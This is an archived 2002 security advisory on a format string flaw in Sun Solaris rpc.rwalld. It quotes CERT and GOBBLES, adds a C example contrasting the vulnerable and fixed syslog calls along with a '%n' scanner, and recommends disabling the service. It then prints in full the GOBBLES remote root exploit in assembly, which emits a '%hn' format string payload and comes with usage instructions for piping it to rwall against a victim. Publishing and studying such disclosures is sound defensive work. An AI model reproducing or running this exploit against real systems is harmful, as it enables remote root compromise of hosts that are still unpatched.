
rpc.rwalld Format String Vulnerability
2nd May 2002 [SBWID-5319]
COMMAND

	Sun rpc.rwalld format string vulnerability

SYSTEMS AFFECTED

	Sun Solaris 2.5.1, 2.6, 7, and 8

PROBLEM

	In CERT [http://www.cert.org/] advisory [CA-2002-10] :

	-snapp-

	 rpc.rwalld is a utility that listens for remote wall requests. Wall is
	 used to send a message to all terminals of a time-sharing system. If
	 the wall command cannot be executed, the rwall daemon will display an
	 error message.

	 An intruder can consume system resources and potentially prevent wall
	 from executing, which would trigger the rwall daemon's error message.
	 A format string vulnerability exists in the code that displays the
	 error message. This vulnerability may permit the intruder to execute
	 code with the privileges of the rwall daemon.

	 This vulnerability may be exploited both locally and remotely,
	 although remote exploitation is significantly more difficult.

	-snipp-
	

	In GOBBLES security advisory [#32] (GOBBLES originally reported the bug),
	they added the following comments to the faulty code:
	

	   /*
	    * Make sure the wall programs exists, is executeable, and runs
	    */
	   if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
	      (fp = popen(WALL_PROG, "w")) == NULL) {
	          syslog(LOG_NOTICE,
	                   "rwall message received but could not execute %s",
	                   WALL_PROG);
	          syslog(LOG_NOTICE, msg);   /* msg comes from the network and is used as the format string */

	

	Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
	this to be exploited? Faulty syslog() only called if rpc.rwalld can not
	execute /usr/sbin/wall on local system, which mean it only exploitable
	if admin have chmod -x or rm /usr/sbin/wall or something like this,
	right, so why this so such a big deal?"

	To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if
	anything is to make popen() fail, there one other way to exploit bug,
	which make it dangerous and affect all installation of Solaris running
	rpc.rwalld, is that popen() to fail if there no available file
	descriptors on system."

	This easier to exploit locally on system. For remote exploitation,
	timing is important and thus is race condition. Each new tcp session to
	running service on target host will consume filedescriptor.
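
	The defect above is the classic one: a string received from the network
	is handed to syslog() as the format argument instead of as data. The
	following C program is an added example for this page; it is not code
	from the advisory, from Sun, from CERT or from GOBBLES. It puts the
	vulnerable shape (message used as the format) next to the fixed shape
	(literal "%s" format, message passed as an argument), using snprintf()
	in place of syslog() so the result lands in a buffer, and adds a small
	scanner a defender can run over received wall messages or daemon logs
	to count printf conversions and flag "%n" style write conversions. The
	function names render_unsafe, render_safe, count_conversions and
	contains_percent_n and the two sample messages are assumptions made up
	for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample messages (made up for this example).  The first has
 * the "%.8x" walk plus "%hn" shape of a format string payload; the second
 * is an ordinary wall text that happens to contain a literal percent. */
static const char *const SAMPLE_HOSTILE = "%.8x%.8x%.8x%hn";
static const char *const SAMPLE_BENIGN  = "disk is 100%% full, save your work";

/* Vulnerable shape, as in rpc.rwalld's error path: the received message is
 * the format argument.  Calling snprintf() through a plain function pointer
 * keeps gcc's -Werror=format-security from refusing the deliberately wrong
 * call; the tests only feed it "%%", so no undefined behaviour is invoked. */
static int (*const fmt_fn)(char *, size_t, const char *, ...) = snprintf;

const char *render_unsafe(const char *msg)
{
    static char out[128];
    fmt_fn(out, sizeof out, msg);        /* msg decides what gets printed */
    return out;
}

/* Fixed shape: a literal format string, the message supplied as data.
 * This is the same one-line change that closes the rwalld hole:
 * syslog(LOG_NOTICE, "%s", msg); */
const char *render_safe(const char *msg)
{
    static char out[128];
    snprintf(out, sizeof out, "%s", msg);
    return out;
}

/* Count printf conversions in a message, treating "%%" as the literal
 * percent it is.  *has_n is set when a "%n"/"%hn" write conversion occurs,
 * which is what turns a format string bug into a memory write primitive. */
static int scan_conversions(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {               /* "%%" renders as a single '%' */
            p++;
            continue;
        }
        count++;
        /* skip flags, field width, precision and length modifiers */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*hlLqjzt$", *q))
            q++;
        if (*q == 'n')
            *has_n = 1;
        if (*q == '\0')                  /* lone '%' at end of string */
            break;
        p = q;
    }
    return count;
}

/* Number of printf conversions an attacker-supplied string would trigger. */
int count_conversions(const char *msg)
{
    int has_n;
    return scan_conversions(msg, &has_n);
}

/* 1 if the string carries a "%n" family conversion, else 0. */
int contains_percent_n(const char *msg)
{
    int has_n;
    scan_conversions(msg, &has_n);
    return has_n;
}

int main(void)
{
    printf("unsafe: %s\n", render_unsafe(SAMPLE_BENIGN));
    printf("safe:   %s\n", render_safe(SAMPLE_BENIGN));
    printf("hostile sample: %d conversions, %%n present: %d\n",
           count_conversions(SAMPLE_HOSTILE),
           contains_percent_n(SAMPLE_HOSTILE));
    printf("benign sample:  %d conversions, %%n present: %d\n",
           count_conversions(SAMPLE_BENIGN),
           contains_percent_n(SAMPLE_BENIGN));
    return 0;
}
```

	Two points worth taking from it. First, the scanner is a detection aid
	for logs and network captures, not a fix: a legitimate wall message may
	contain a '%', so filtering on it would drop valid traffic, while the
	"%s" form is safe for any input. Second, the fix belongs in the error
	path itself, because as GOBBLES points out that path is reached by any
	popen() failure, including file descriptor exhaustion, not only by a
	missing or non-executable /usr/sbin/wall.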
	

	And the "not so exploitable" exploit:
	

	/*
	   Remote Root Exploit for Solaris 6-8 rpc.walld

	      Usage Instructions:
	       1. Compile.
	           gcc -o xwall xwall.s
	       2. Run.
	          (./xwall ; ./shellcode) | rwall victim
	       3. Late Easter egg.
	          strings xwall

	      Note(s):
	       Something else must be done to consume FD's on
	       victim system.  Figure this one out for self.

	       This exploit written to be run on Linux.  Supplied
	       format string is for Sparc Solaris.  Provide own
	       remote shellcode and use as above described.

	   Love,
	   GOBBLES Security
	   http://www.bugtraq.org
	   GOBBLES@hushmail.com
	*/

	retloc:
	.long 0x41424344
	retaddr:
	.long 0x60bb135
	padding:
	.long 4
	walkcount:
	.long 1
	.globl main
	.type main,@function
	main:
	pusha
	movl (padding),%ecx
	jusfhds7fg:
	pushl %ecx
	movl $4,%eax
	movl $1,%ebx
	pushl $0x00000041
	movl %esp,%ecx
	movl $1,%edx
	int $0x80
	popl %ecx
	popl %ecx
	loop jusfhds7fg
	movl %esp,24(%esp)
	pushl $0x42424242
	movl $4,%edx
	movl %esp,%ecx
	movl $1,%ebx
	movl $4,%eax
	int $0x80
	movl (retloc),%eax
	bswapl %eax
	pushl %eax
	subl $4,%ecx
	movl %edx,%eax
	int $0x80
	addl $4,%ecx
	movl %edx,%eax
	int $0x80
	subl $4,%ecx
	popl %eax
	bswapl %eax
	incl %eax
	incl %eax
	bswapl %eax
	pushl %eax
	movl %edx,%eax
	int $0x80
	popl %eax
	movl %esp,%edx
	incl %edx
	xorl %esi,101(%ebp)
	andb %al,111(%edx)
	popa
	pushl %edx
	andb %al,97(%ebx)
	decl %esi
	aaa
	andb %al,111(%ebx)
	incl %esp
	xorl (%ecx),%eax
	movl (walkcount),%ecx
	cmpl $0,%ecx
	je nczxhczjcg89zg89
	pushl %ecx
	movl $4,%edx
	movl $1,%ebx
	pushl $0x78382e25
	cmzxnczxcz8c:
	pushl %ecx
	movl %esp,%ecx
	addl $4,%ecx
	movl $4,%eax
	int $0x80
	popl %ecx
	loop cmzxnczxcz8c
	popl %ecx
	popl %ecx
	nczxhczjcg89zg89:
	movl (retaddr),%edx
	pushl %edx
	shr $16,%edx
	subl %edx,(%esp)
	movw $0,2(%esp)
	pushl %edx
	shll $3,%ecx
	subl %ecx,(%esp)
	movl (padding),%edx
	subl %edx,(%esp)
	subl $16,(%esp)
	movw $0,2(%esp)
	pushl $cznxczxczxh8
	call printf
	movl $1,%eax
	int $0x80
	cznxczxczxh8:
	.string "%%%uc%%hn%%%uc%%hn\n"

	

	

SOLUTION

	Disabling rpc.rwalld in inetd.conf is the recommended workaround until
	patches are available.
